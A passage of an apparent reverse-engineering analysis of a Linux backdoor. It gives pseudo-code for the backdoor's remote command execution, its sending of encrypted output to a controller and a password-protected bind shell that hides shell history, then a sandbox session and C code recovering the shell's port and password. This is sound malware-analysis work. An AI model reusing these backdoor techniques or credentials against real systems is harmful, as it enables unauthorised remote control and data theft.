        //If gWord2_0_or_2 == 2 it gets everything from the 2ndBuf, except one
        //   of the addresses that's left intact
        //If gWord2_0_or_2 == 0 it fills everything with random values except
        //   the "random hole" of the array with the first value passed on 2ndBuf[3..6]
        //If gWord2_0_or_2 == other it fills everything with random values except
        //   the first value, which is set to the first value passed on 2ndBuf[3..6]

    case3:
        gPID = fork();
        if (gPID==0) {//child
            setsid()
            signal(sigChild,1);
            if (fork()!=0) { //parent
                sleep(10);
                kill (gpid, SIGKILL); //???? Does it kill anyone??? gpid=0!!!
                _called_to_exit(0);
            }
            for (ebx=0;ebx<398;ebx++) Buf2[ebx]=Buf2[ebx+2];
            sprintf(Buffer, "/bin/csh -f -c "%s" 1> %s 2>&1",Buf2, "/tmp/.hj237349");
            EXECUTES IT
            OPEN (tmp)
            while READS tmp file
                Encrypts
                FUN1_sends it to (var_AddrPtr, 44E8Buffer, (rand()mod 201) +400);
            endwhile;
            exit(0);
        };
        break;

    case4:
        if (gPID2==0) {
            gLastCommand = 4;
            gPID2 = fork();
            if (gPID2==0) {
                var_buf256Bytes[0..255]=var_Buf2[0..255];
                var_buf256Bytes[0..255]=var_buf256Bytes[0+9..255+9];
                Loc_Fun_4 ( var_Buf2[2,3,4,5],0,var_Buf2[6,7,8],&var_buf256Bytes);
                //gPID2=0 in Loc_Fun_4
                exit(0);
            }
        }

    case5:
        if (gPID2==0) {
            gLastCommand = 5;
            gPID2 = fork();
            if (gPID2==0) {
                var_Buf256Bytes[0..255]=Buf2[0..255];
                var_Buf256Bytes[0..255]=var_Buf256Bytes[0+13..255+13];
                Loc_Fun_6 ( var_Buf2[2,3,4,5,6,7,8,9,10,11,12,&var_buf256Bytes);
                //gPID2=0 inside Loc_Fun_6
                exit(0);
            }
        }

    case6:
        if (gpid2==0) {
            gLastCommand = 6;
            signal(SIGCHLD,SIG_IGN);
            gPID2=fork();
            if (gPID2==0) {
                setsid();
                signal(SIGCHLD,SIG_IGN);
                var_bindSockAddr.sin_family = AF_INET;
                var_bindSockAddr.s_addr=0F15Ah;
                var_bindSockAddr.s_addr+2=0
                var_setsockopt_optval=1
                var_SD = socket (AF_INET,SOCKSTREAM,0);
                signal (SIGCHLD,SIG_IGN);
                signal (SIGCHLD,SIG_IGN);
                signal (SIG_HUP,SIG_IGN);
                setsockopt(var_mainSD, SOL_SOCKET, SO_REUSEADDR,&var_setsockopt_optval);
                bind(var_SD,&var_bindSockAddr,16);
                listen(var_SD,3);
                do {
                    var_FD = accept(var_SD,&var_AcceptSockAddr, &var_AcceptAddrLen);
                    if (var_FD==0) exit(0);
                } while(fork()==0);
                recv (var_FD, &var_TCPRecvBuf,19,0);
                for (bx=0;bx<=18;bx++) do {
                    if (var_TCPRecvBuf[bx]==(LineFeed|CR))
                        var_TCPRecvBuf[bx]=0;
                    else
                        var_TCPRecvBuf[bx]++;
                }
                if (var_TCPRecvBuf!="TfOjG") {
                    send(var_FD,gPwdFailedRespo,4,0);
                    close(var_FD);
                    exit(1);
                }
                dup2(var_FD,0);
                dup2(var_FD,1);
                dup2(var_FD,2);
                setenv("PATH", "/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/bin/:.",1);
                unsetenv("HISTFILE");
                setenv("TERM","linux",1);
                execl("/bin/sh","sh",0);
                close(var_FD);
                exit(0);
            }
        };
        break;

    case7:
        gPID = fork();
        if (gPID==0) {
            setsid()
            signal(SIGCHLD,1);
            if (fork()!=0)
                {sleep???(1200);kill(SIGKILL,gPID);exit(0);}//1200=20min
            for(ebx=0;ebx<=397;ebx++) var_Buf2[ebx]=var_Buf2[ebx+2];
            sprintf(&Buffer, "/bin/csh -f -c "%s" ",Buf2Ptr);
            ??execv??(&Buffer);
            exit(0);
        }
        break;

    case8:
        if (gPID2!=0) {
            kill(gPID2,SIGKILL);
            gPID2 = 0;
        }
        break;

    case9:
        if (gPID2==0) {
            g_LastCommand = 9;
            gPID2==fork()
            if (gPID2!=0) {
                var_Buf256Bytes[0..255]=Buf2[0..255];
                var_Buf256Bytes[0..255]=var_Buf256Bytes[0+10..255+10];
                Fun4(buf2[2,3,4,5,6,7,8,9],&var_Buf256Bytes);
                exit(0);
            }
        }
        break;

    case10:
        if (gPID2==0) {
            g_LastCommand = 9;
            gPID2==fork()
            if (gPID2!=0) {
                var_Buf256Bytes[0..255]=Buf2[0..255];
                var_Buf256Bytes[0..255]=var_Buf256Bytes[0+14..255+14];
                Fun7(buf2[2,3,4,5,6,7,8,9,10,11,12],0,buf2[13],&var_Buf256Bytes);
                exit(0);
            }
        }
        break;

    case11:
        if (gPID2==0) {
            g_LastCommand = 11;
            gPID2==fork()
            if (gPID2!=0) {
                var_Buf256Bytes[0..255]=Buf2[0..255];
                var_Buf256Bytes[0..255]=var_Buf256Bytes[0+15..255+15];
                Fun7(buf2[2,3,4,5,6,7,8,9,10,11,12,13,14],&var_Buf256Bytes);
                exit(0);
            }
        }
        break;

    case 12:
        if (gPID2==0) {
            g_LastCommand = 12;
            gPID2==fork()
            if (gPID2!=0) {
                var_256Bytes[0..255]=Buf2[0..255];
                var_256Bytes[0..255]=var_256Bytes[0+14..255+14];
                Fun5(buf2[2,3,4,5,6,7,8,9,10,11,12,13],&var_256Bytes);
                exit(0);
            }
        }
        break;
We can see that there are several calls to functions defined nearby (named FunN or LocFunN). We'll have to work a little bit on them. Here's a quick description of the functionality they provide;
With all that we can see part of the functionality that these "cases" provide;
This produces an output of an "encrypted" version of /etc/services on the server
    ./encrypt 3 < catservices.dat >command3.catservices.pkt
    cat command2.2048.pkt command3.catservices.pkt > command2-3.catservices.pkt
Note: After this test there will be 2 processes "[mingetty]" running. We'll have to SIGKILL both.
    [tstusr@sandbox reverse]$ ./encrypt 6 <256bytes.dat >command6.pkt
    [tstusr@sandbox reverse]$ cat command2.2048.pkt command6.pkt > command2-6.pkt
    [tstusr@sandbox reverse]$ ./the-binary-dressed-NOROOT-NOFORK1-NOFORK2-STDIN < command2-6.pkt &
    [1] 1792
    [tstusr@sandbox reverse]$ nc 127.0.0.1 23281
    SeNiF
    pwd
    /
    uname -a
    Linux sandbox 2.4.2-2 #1 Sun Apr 8 19:37:14 EDT 2001 i586 unknown
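The two values used in this session, the port 23281 and the password "SeNiF", both follow from the pseudo-code of "case 6". The sketch below only illustrates that reasoning; password_ok and port_from_le_word are hypothetical names, and we assume that the word 0F15Ah stored in the sockaddr is the port field as read on a little-endian machine. Swapping its bytes gives 5AF1h, which is 23281. The password check adds 1 to every received byte (cutting the string at CR or LF) and compares the result with "TfOjG", so the text to type is "TfOjG" with every letter decremented by one.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Mimic the check in case 6: cut at CR/LF, add 1 to every other byte,
 * then compare with the stored string. Only the first 19 bytes count. */
int password_ok(const char *input)
{
    char buf[20];
    size_t n;

    assert(input != NULL);
    n = strlen(input);
    if (n > 19)
        n = 19;
    memcpy(buf, input, n);
    buf[n] = '\0';
    for (size_t i = 0; i < n; i++) {
        if (buf[i] == '\n' || buf[i] == '\r')
            buf[i] = '\0';
        else
            buf[i] = (char)(buf[i] + 1);
    }
    return strcmp(buf, "TfOjG") == 0;
}

/* Convert a 16-bit word, as read on a little-endian machine from a field
 * stored in network byte order, into the port number it represents. */
unsigned port_from_le_word(unsigned word)
{
    return ((word & 0xffu) << 8) | ((word >> 8) & 0xffu);
}
```

Here password_ok("SeNiF\n") succeeds and port_from_le_word(0xF15A) evaluates to 23281, the port we connected to with nc.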